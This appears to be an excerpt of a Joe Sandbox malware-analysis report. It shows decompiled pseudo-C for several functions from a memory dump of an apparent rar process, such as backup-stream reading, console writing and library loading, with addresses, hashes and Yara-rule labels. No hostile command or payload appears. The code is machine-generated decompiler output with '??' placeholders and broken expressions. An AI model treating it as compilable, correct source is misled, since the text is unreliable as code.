				if ( *((intOrPtr*)(_t143 + 0x68)) - r13d > 0) goto 0x50b2e45d;
				if ( *((intOrPtr*)(_t143 + 0x6c)) - r13d <= 0) goto 0x50b2e535;
				 *((long long*)(_t143 + 0x28)) = _t161;
				r8d = 0x7fffffff;
				 *((long long*)(_t143 + 0x20)) = _t143 + 0x44;
				_t62 = BackupSeek(??, ??, ??, ??, ??, ??);
				if (_t62 != 0) goto 0x50b2e531;
				_t108 =  *((intOrPtr*)(_t143 + 0x6c));
				if ( *((intOrPtr*)(_t143 + 0x48)) != __ecx) goto 0x50b2e4a5;
				if ( *((intOrPtr*)(_t143 + 0x44)) == _t62) goto 0x50b2e531;
				r12d = r13d;
				_t132 = (_t62 << 0x20) + _t108;
				if (_t132 <= 0) goto 0x50b2e50b;
				if (r12d - 0x3e8 >= 0) goto 0x50b2e506;
				 *((long long*)(_t143 + 0x30)) = _t161;
				 *((intOrPtr*)(_t143 + 0x28)) = 1;
				 *((intOrPtr*)(_t143 + 0x20)) = r13d;
				_t74 =  >  ? 0x1000 : __edi;
				r8d =  >  ? 0x1000 : __edi;
				BackupRead(??, ??, ??, ??, ??, ??, ??);
				r12d = r12d + 1;
				if (_t132 - _t108 > 0) goto 0x50b2e4be;
				_t137 =  *((intOrPtr*)(_t143 + 0x50));
				_t109 = _t143 + 0x44;
				 *((long long*)(_t143 + 0x28)) = _t161;
				r8d = 0x7fffffff;
				 *((long long*)(_t143 + 0x20)) = _t109;
				BackupSeek(??, ??, ??, ??, ??, ??);
				if ( *((intOrPtr*)(_t143 + 0x70)) == 0) goto 0x50b2e3b2;
				if ( *((intOrPtr*)(_t143 + 0x60)) != 4) goto 0x50b2e3b2;
				r8d = 0x104;
				E00007FF67FF650B5A390(_t137 + 0x2c, _t143 + 0x74, _t145);
				E00007FF67FF650B6C330(0x3a, _t137 + 0x2e, _t143 + 0x48);
				if (_t109 == 0) goto 0x50b2e573;
				 *_t109 = r13w;
				 *((intOrPtr*)(_t137 + 0x20)) =  *((intOrPtr*)(_t143 + 0x68));
				 *((intOrPtr*)(_t137 + 0x1c)) =  *((intOrPtr*)(_t143 + 0x6c));
				goto 0x50b2e587;
				return E00007FF67FF650B69D10(0,  *((intOrPtr*)(_t143 + 0x6c)),  *(_t142 - 0x1f70 + 0x1f60) ^ _t143);
			}

























                                                                                                            0x7ff650b2e350
                                                                                                            0x7ff650b2e36d
                                                                                                            0x7ff650b2e372
                                                                                                            0x7ff650b2e375
                                                                                                            0x7ff650b2e37c
                                                                                                            0x7ff650b2e37f
                                                                                                            0x7ff650b2e389
                                                                                                            0x7ff650b2e396
                                                                                                            0x7ff650b2e39c
                                                                                                            0x7ff650b2e3a5
                                                                                                            0x7ff650b2e3ab
                                                                                                            0x7ff650b2e3af
                                                                                                            0x7ff650b2e3ba
                                                                                                            0x7ff650b2e3c4
                                                                                                            0x7ff650b2e3cc
                                                                                                            0x7ff650b2e3d2
                                                                                                            0x7ff650b2e3df
                                                                                                            0x7ff650b2e3ea
                                                                                                            0x7ff650b2e3f0
                                                                                                            0x7ff650b2e3f6
                                                                                                            0x7ff650b2e3fd
                                                                                                            0x7ff650b2e40b
                                                                                                            0x7ff650b2e415
                                                                                                            0x7ff650b2e41d
                                                                                                            0x7ff650b2e420
                                                                                                            0x7ff650b2e42d
                                                                                                            0x7ff650b2e437
                                                                                                            0x7ff650b2e445
                                                                                                            0x7ff650b2e450
                                                                                                            0x7ff650b2e457
                                                                                                            0x7ff650b2e465
                                                                                                            0x7ff650b2e46f
                                                                                                            0x7ff650b2e475
                                                                                                            0x7ff650b2e47d
                                                                                                            0x7ff650b2e485
                                                                                                            0x7ff650b2e490
                                                                                                            0x7ff650b2e499
                                                                                                            0x7ff650b2e49f
                                                                                                            0x7ff650b2e4a8
                                                                                                            0x7ff650b2e4b1
                                                                                                            0x7ff650b2e4b7
                                                                                                            0x7ff650b2e4c5
                                                                                                            0x7ff650b2e4cf
                                                                                                            0x7ff650b2e4de
                                                                                                            0x7ff650b2e4e8
                                                                                                            0x7ff650b2e4ed
                                                                                                            0x7ff650b2e4f0
                                                                                                            0x7ff650b2e4f3
                                                                                                            0x7ff650b2e4fb
                                                                                                            0x7ff650b2e504
                                                                                                            0x7ff650b2e506
                                                                                                            0x7ff650b2e50e
                                                                                                            0x7ff650b2e513
                                                                                                            0x7ff650b2e51d
                                                                                                            0x7ff650b2e523
                                                                                                            0x7ff650b2e52b
                                                                                                            0x7ff650b2e537
                                                                                                            0x7ff650b2e542
                                                                                                            0x7ff650b2e54c
                                                                                                            0x7ff650b2e557
                                                                                                            0x7ff650b2e565
                                                                                                            0x7ff650b2e56d
                                                                                                            0x7ff650b2e56f
                                                                                                            0x7ff650b2e579
                                                                                                            0x7ff650b2e580
                                                                                                            0x7ff650b2e583
                                                                                                            0x7ff650b2e5b0

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Backup$Read$Seek
                                                                                                            • String ID:
                                                                                                            • API String ID: 3093234742-0
                                                                                                            • Opcode ID: 3f36299eedb2fcd9dc937757bb495d7074025f3be3c1243d07afe7e3cfa54f75
                                                                                                            • Instruction ID: 5c4f98117927baf55b70b592d8c9d193386b0e81e4addcd647c0ad5944e36b2e
                                                                                                            • Opcode Fuzzy Hash: 3f36299eedb2fcd9dc937757bb495d7074025f3be3c1243d07afe7e3cfa54f75
                                                                                                            • Instruction Fuzzy Hash: EC518A3661874396E760CF15E88016A73A5FB86798F140235EAAE93BD8DF3ED545CF00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B774D0 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 32%
                                                                                                            			E00007FF67FF650B774D0(signed int __edx, void* __edi, void* __esi, long long __rbx, signed long long __rcx, void* __rdx, long long __r8, void* __r9, long long _a8) {
				signed int _v72;
				char _v80;
				intOrPtr _v87;
				char _v88;
				long long _v96;
				long long _v104;
				int _v108;
				intOrPtr _v112;
				short _v116;
				char _v120;
				signed long long _v128;
				signed long long _v136;
				intOrPtr _v144;
				signed int _v152;
				void* __rsi;
				int _t80;
				signed char _t87;
				signed long long _t117;
				intOrPtr* _t126;
				signed long long _t128;
				intOrPtr _t137;
				signed long long _t141;
				void* _t144;
				signed long long _t147;
				void* _t149;
				void* _t157;
				void* _t158;
				signed long long _t162;

				_t128 = __rcx;
				_a8 = __rbx;
				_t117 =  *0x50b978f0; // 0x27db226282f1
				_v72 = _t117 ^ _t149 - 0x00000080;
				r12d = r9d;
				_t162 = __edx >> 6;
				_t147 = __edx << 6;
				_v96 = __r8;
				_t126 = __rcx;
				_t158 = _t157 + __r8;
				_v104 = 0x50bb3c40;
				_v108 = GetConsoleCP();
				 *__rcx = __rdx;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if (__r8 - _t158 >= 0) goto 0x50b776ae;
				r13b =  *((intOrPtr*)(__r8));
				_v120 = 0;
				_t137 =  *((intOrPtr*)(0x50bb3c40 + _t162 * 8));
				_t87 =  *(_t137 + _t147 + 0x3d);
				if ((_t87 & 0x00000004) == 0) goto 0x50b77583;
				 *(_t137 + _t147 + 0x3d) = _t87 & 0x000000fb;
				r8d = 2;
				_v88 =  *((intOrPtr*)(_t137 + _t147 + 0x3e));
				_v87 = r13b;
				goto 0x50b775c8;
				E00007FF67FF650B76770(_t87 & 0x000000fb, 0,  *((intOrPtr*)( *((intOrPtr*)(0x50bb3c40 + _t162 * 8)) + _t147 + 0x28)), __rcx, __rcx, __r9);
				if (( *(0x50bb3c40 + _t128 * 2) & 0x00008000) == 0) goto 0x50b775bf;
				if (__r8 - _t158 >= 0) goto 0x50b7768e;
				r8d = 2;
				if (E00007FF67FF650B75144(0x8000,  *((intOrPtr*)( *((intOrPtr*)(0x50bb3c40 + _t162 * 8)) + _t147 + 0x28)), _t126,  &_v120, __r8, _t147, __r8) == 0xffffffff) goto 0x50b776ae;
				_t144 = __r8 + 1;
				goto 0x50b775da;
				r8d = 1;
				if (E00007FF67FF650B75144(0x8000,  *((intOrPtr*)( *((intOrPtr*)(0x50bb3c40 + _t162 * 8)) + _t147 + 0x28)), _t126,  &_v120, _t144, _t147, __r8) == 0xffffffff) goto 0x50b776ae;
				_v128 = _v128 & 0x00000000;
				_v136 = _v136 & 0x00000000;
				r9d = 1;
				_v144 = 5;
				_v152 =  &_v80;
				_t80 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
				r14d = _t80;
				if (_t80 == 0) goto 0x50b776ae;
				_v152 = _v152 & 0x00000000;
				_t141 =  &_v80;
				r8d = _t80;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x50b776a6;
				 *((intOrPtr*)(_t126 + 4)) =  *((intOrPtr*)(_t126 + 8)) - _v96 + __edi;
				if (_v112 - r14d < 0) goto 0x50b776ae;
				if (r13b != 0xa) goto 0x50b77686;
				_t50 = _t141 + 0xd; // 0xd
				_v152 = _t141;
				_t52 = _t141 + 1; // 0x1
				r8d = _t52;
				_v116 = _t50;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x50b776a6;
				if (_v112 - 1 < 0) goto 0x50b776ae;
				 *((intOrPtr*)(_t126 + 8)) =  *((intOrPtr*)(_t126 + 8)) + 1;
				 *((intOrPtr*)(_t126 + 4)) =  *((intOrPtr*)(_t126 + 4)) + 1;
				goto 0x50b77544;
				 *((char*)( *((intOrPtr*)(0x50bb3c40 + _t162 * 8)) + _t147 + 0x3e)) =  *((intOrPtr*)(_t144 + 1));
				 *( *((intOrPtr*)(0x50bb3c40 + _t162 * 8)) + _t147 + 0x3d) =  *( *((intOrPtr*)(0x50bb3c40 + _t162 * 8)) + _t147 + 0x3d) | 0x00000004;
				 *((intOrPtr*)(_t126 + 4)) =  *((intOrPtr*)(_t126 + 4)) + 1;
				goto 0x50b776ae;
				 *_t126 = GetLastError();
				return E00007FF67FF650B69D10(_t85,  *((intOrPtr*)(_t126 + 8)) - _v96 + __edi, _v72 ^ _t149 - 0x00000080);
			}































                                                                                                            0x7ff650b774d0
                                                                                                            0x7ff650b774d0
                                                                                                            0x7ff650b774ea
                                                                                                            0x7ff650b774f4
                                                                                                            0x7ff650b77505
                                                                                                            0x7ff650b77508
                                                                                                            0x7ff650b7750f
                                                                                                            0x7ff650b77516
                                                                                                            0x7ff650b7751a
                                                                                                            0x7ff650b7751d
                                                                                                            0x7ff650b77529
                                                                                                            0x7ff650b77535
                                                                                                            0x7ff650b77538
                                                                                                            0x7ff650b7753e
                                                                                                            0x7ff650b77544
                                                                                                            0x7ff650b7754a
                                                                                                            0x7ff650b77554
                                                                                                            0x7ff650b77558
                                                                                                            0x7ff650b7755c
                                                                                                            0x7ff650b77563
                                                                                                            0x7ff650b7756c
                                                                                                            0x7ff650b77570
                                                                                                            0x7ff650b7757a
                                                                                                            0x7ff650b7757d
                                                                                                            0x7ff650b77581
                                                                                                            0x7ff650b77583
                                                                                                            0x7ff650b77594
                                                                                                            0x7ff650b77599
                                                                                                            0x7ff650b7759f
                                                                                                            0x7ff650b775b4
                                                                                                            0x7ff650b775ba
                                                                                                            0x7ff650b775bd
                                                                                                            0x7ff650b775bf
                                                                                                            0x7ff650b775d4
                                                                                                            0x7ff650b775da
                                                                                                            0x7ff650b775e4
                                                                                                            0x7ff650b775f1
                                                                                                            0x7ff650b775f7
                                                                                                            0x7ff650b77601
                                                                                                            0x7ff650b77609
                                                                                                            0x7ff650b7760f
                                                                                                            0x7ff650b77614
                                                                                                            0x7ff650b77622
                                                                                                            0x7ff650b77628
                                                                                                            0x7ff650b7762c
                                                                                                            0x7ff650b77639
                                                                                                            0x7ff650b77643
                                                                                                            0x7ff650b7764a
                                                                                                            0x7ff650b77650
                                                                                                            0x7ff650b77656
                                                                                                            0x7ff650b77659
                                                                                                            0x7ff650b7765e
                                                                                                            0x7ff650b7765e
                                                                                                            0x7ff650b77666
                                                                                                            0x7ff650b77678
                                                                                                            0x7ff650b7767e
                                                                                                            0x7ff650b77680
                                                                                                            0x7ff650b77683
                                                                                                            0x7ff650b77689
                                                                                                            0x7ff650b77694
                                                                                                            0x7ff650b7769c
                                                                                                            0x7ff650b776a1
                                                                                                            0x7ff650b776a4
                                                                                                            0x7ff650b776ac
                                                                                                            0x7ff650b776d7

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 3659116390-0
                                                                                                            • Opcode ID: 99acae0dc37e2a83fa59d8e4e91294ce385254061264d2613ca360648f1cf77f
                                                                                                            • Instruction ID: 1e076f1ed14160e2c5ff72525a3ecc25d92e57a6f844a16ac9413e97747c36da
                                                                                                            • Opcode Fuzzy Hash: 99acae0dc37e2a83fa59d8e4e91294ce385254061264d2613ca360648f1cf77f
                                                                                                            • Instruction Fuzzy Hash: A351B332A18A529AE710CB65D5843AC7BB1FB4AB98F188135DE4FA7B98DF39D141C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B329C4 Relevance: 7.6, APIs: 5, Instructions: 132fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$FileHandleWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 1958782092-0
                                                                                                            • Opcode ID: 6ed74b68348eb1f44ba76aff3a05a96c9585fcd99b24f3806938600a92963972
                                                                                                            • Instruction ID: 949a8f960d4596507d8edb9263019e1c9a357109da02de28115a04fc2b126197
                                                                                                            • Opcode Fuzzy Hash: 6ed74b68348eb1f44ba76aff3a05a96c9585fcd99b24f3806938600a92963972
                                                                                                            • Instruction Fuzzy Hash: D9517136718643A3EE649F25A4942B9A360FF8AB94F184131DE4F977A4DE3EE445C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B769E4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 36%
                                                                                                            			E00007FF67FF650B769E4(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				signed long long _t72;
				signed long long _t76;
				intOrPtr _t78;
				signed long long _t80;
				signed long long _t89;
				struct HINSTANCE__* _t94;
				signed long long _t95;
				long long _t101;
				void* _t105;
				signed long long _t109;
				signed long long _t111;
				signed long long _t114;
				struct HINSTANCE__* _t115;
				long _t118;
				void* _t121;
				WCHAR* _t123;

				 *((long long*)(_t105 + 8)) = __rbx;
				 *((long long*)(_t105 + 0x10)) = _t101;
				 *((long long*)(_t105 + 0x18)) = __rsi;
				r14d = __ecx;
				_t111 =  *0x50b978f0; // 0x27db226282f1
				_t95 = _t94 | 0xffffffff;
				_t89 = _t111 ^  *(0x7ff650b10000 + 0xa4300 + _t121 * 8);
				asm("dec eax");
				if (_t89 == _t95) goto 0x50b76b65;
				if (_t89 == 0) goto 0x50b76a4d;
				_t72 = _t89;
				goto 0x50b76b67;
				if (__r8 == __r9) goto 0x50b76af9;
				_t78 =  *((intOrPtr*)(0x7ff650b10000 + 0xa4260 + __rsi * 8));
				if (_t78 == 0) goto 0x50b76a6d;
				if (_t78 == _t95) goto 0x50b76ae5;
				goto 0x50b76ae0;
				r8d = 0x800;
				LoadLibraryExW(_t123, _t121, _t118);
				if (_t72 != 0) goto 0x50b76aae;
				if (GetLastError() != 0x57) goto 0x50b76aac;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				_t80 = _t72;
				goto 0x50b76aae;
				if (_t80 != 0) goto 0x50b76ac7;
				 *((intOrPtr*)(0x7ff650b10000 + 0xa4260 + __rsi * 8)) = _t95;
				goto 0x50b76ae5;
				_t19 = 0x7ff650b10000 + 0xa4260 + __rsi * 8;
				_t76 =  *_t19;
				 *_t19 = _t80;
				if (_t76 == 0) goto 0x50b76ae0;
				FreeLibrary(_t115);
				if (_t80 != 0) goto 0x50b76b3a;
				if (__r8 + 4 != __r9) goto 0x50b76a56;
				if (_t80 == 0) goto 0x50b76b4a;
				GetProcAddress(_t94);
				if (_t76 == 0) goto 0x50b76b43;
				_t109 =  *0x50b978f0; // 0x27db226282f1
				asm("dec eax");
				 *(0x7ff650b10000 + 0xa4300 + _t121 * 8) = _t76 ^ _t109;
				goto 0x50b76b67;
				goto 0x50b76afb;
				_t114 =  *0x50b978f0; // 0x27db226282f1
				asm("dec eax");
				 *(0x7ff650b10000 + 0xa4300 + _t121 * 8) = _t95 ^ _t114;
				return 0;
			}



















                                                                                                            0x7ff650b769e4
                                                                                                            0x7ff650b769e9
                                                                                                            0x7ff650b769ee
                                                                                                            0x7ff650b76a00
                                                                                                            0x7ff650b76a1b
                                                                                                            0x7ff650b76a22
                                                                                                            0x7ff650b76a2c
                                                                                                            0x7ff650b76a34
                                                                                                            0x7ff650b76a3a
                                                                                                            0x7ff650b76a43
                                                                                                            0x7ff650b76a45
                                                                                                            0x7ff650b76a48
                                                                                                            0x7ff650b76a50
                                                                                                            0x7ff650b76a59
                                                                                                            0x7ff650b76a64
                                                                                                            0x7ff650b76a69
                                                                                                            0x7ff650b76a6b
                                                                                                            0x7ff650b76a7a
                                                                                                            0x7ff650b76a80
                                                                                                            0x7ff650b76a8c
                                                                                                            0x7ff650b76a97
                                                                                                            0x7ff650b76a99
                                                                                                            0x7ff650b76aa1
                                                                                                            0x7ff650b76aa7
                                                                                                            0x7ff650b76aaa
                                                                                                            0x7ff650b76ab8
                                                                                                            0x7ff650b76abd
                                                                                                            0x7ff650b76ac5
                                                                                                            0x7ff650b76aca
                                                                                                            0x7ff650b76aca
                                                                                                            0x7ff650b76aca
                                                                                                            0x7ff650b76ad5
                                                                                                            0x7ff650b76ada
                                                                                                            0x7ff650b76ae3
                                                                                                            0x7ff650b76aec
                                                                                                            0x7ff650b76afe
                                                                                                            0x7ff650b76b06
                                                                                                            0x7ff650b76b0f
                                                                                                            0x7ff650b76b11
                                                                                                            0x7ff650b76b2a
                                                                                                            0x7ff650b76b30
                                                                                                            0x7ff650b76b38
                                                                                                            0x7ff650b76b41
                                                                                                            0x7ff650b76b43
                                                                                                            0x7ff650b76b57
                                                                                                            0x7ff650b76b5d
                                                                                                            0x7ff650b76b83

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 190572456-0
                                                                                                            • Opcode ID: 0925409aed5cd5c5f65d13f425a5979f905592a232830589d947d74563d08c43
                                                                                                            • Instruction ID: 7f3aa864d09567d1dcb0abb58d8adf0eb4b0c31d79eb08e544c8019391759cad
                                                                                                            • Opcode Fuzzy Hash: 0925409aed5cd5c5f65d13f425a5979f905592a232830589d947d74563d08c43
                                                                                                            • Instruction Fuzzy Hash: 5541E022B19A03A5FE559B02A8846B66291BF56BE0F1D8535ED1FEB794DF3EE4008340
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B7DCC0 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E00007FF67FF650B7DCC0(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t47;
				void* _t52;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x50b7dcf1;
				if (__edx >= 0) goto 0x50b7dcf1;
				E00007FF67FF650B7E44C(_t27, _t52);
				_t28 = _t27 & 0xfffffff7;
				goto 0x50b7dd48;
				_t43 = 0x00000004 & dil;
				if (_t43 == 0) goto 0x50b7dd0c;
				asm("dec eax");
				if (_t43 >= 0) goto 0x50b7dd0c;
				E00007FF67FF650B7E44C(_t28, _t52);
				_t29 = _t28 & 0xfffffffb;
				goto 0x50b7dd48;
				_t44 = dil & 0x00000001;
				if (_t44 == 0) goto 0x50b7dd28;
				asm("dec eax");
				if (_t44 >= 0) goto 0x50b7dd28;
				E00007FF67FF650B7E44C(_t29, _t52);
				_t30 = _t29 & 0xfffffffe;
				goto 0x50b7dd48;
				_t45 = dil & 0x00000002;
				if (_t45 == 0) goto 0x50b7dd48;
				asm("dec eax");
				if (_t45 >= 0) goto 0x50b7dd48;
				if ((dil & 0x00000010) == 0) goto 0x50b7dd45;
				E00007FF67FF650B7E44C(_t30, _t52);
				_t31 = _t30 & 0xfffffffd;
				_t47 = dil & 0x00000010;
				if (_t47 == 0) goto 0x50b7dd62;
				asm("dec eax");
				if (_t47 >= 0) goto 0x50b7dd62;
				E00007FF67FF650B7E44C(_t31, _t52);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}













                                                                                                            0x7ff650b7dcc0
                                                                                                            0x7ff650b7dcc5
                                                                                                            0x7ff650b7dcd4
                                                                                                            0x7ff650b7dcdc
                                                                                                            0x7ff650b7dce0
                                                                                                            0x7ff650b7dce7
                                                                                                            0x7ff650b7dcec
                                                                                                            0x7ff650b7dcef
                                                                                                            0x7ff650b7dcf6
                                                                                                            0x7ff650b7dcf9
                                                                                                            0x7ff650b7dcfb
                                                                                                            0x7ff650b7dd00
                                                                                                            0x7ff650b7dd02
                                                                                                            0x7ff650b7dd07
                                                                                                            0x7ff650b7dd0a
                                                                                                            0x7ff650b7dd0c
                                                                                                            0x7ff650b7dd10
                                                                                                            0x7ff650b7dd12
                                                                                                            0x7ff650b7dd17
                                                                                                            0x7ff650b7dd1e
                                                                                                            0x7ff650b7dd23
                                                                                                            0x7ff650b7dd26
                                                                                                            0x7ff650b7dd28
                                                                                                            0x7ff650b7dd2c
                                                                                                            0x7ff650b7dd2e
                                                                                                            0x7ff650b7dd33
                                                                                                            0x7ff650b7dd39
                                                                                                            0x7ff650b7dd40
                                                                                                            0x7ff650b7dd45
                                                                                                            0x7ff650b7dd48
                                                                                                            0x7ff650b7dd4c
                                                                                                            0x7ff650b7dd4e
                                                                                                            0x7ff650b7dd53
                                                                                                            0x7ff650b7dd5a
                                                                                                            0x7ff650b7dd78

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
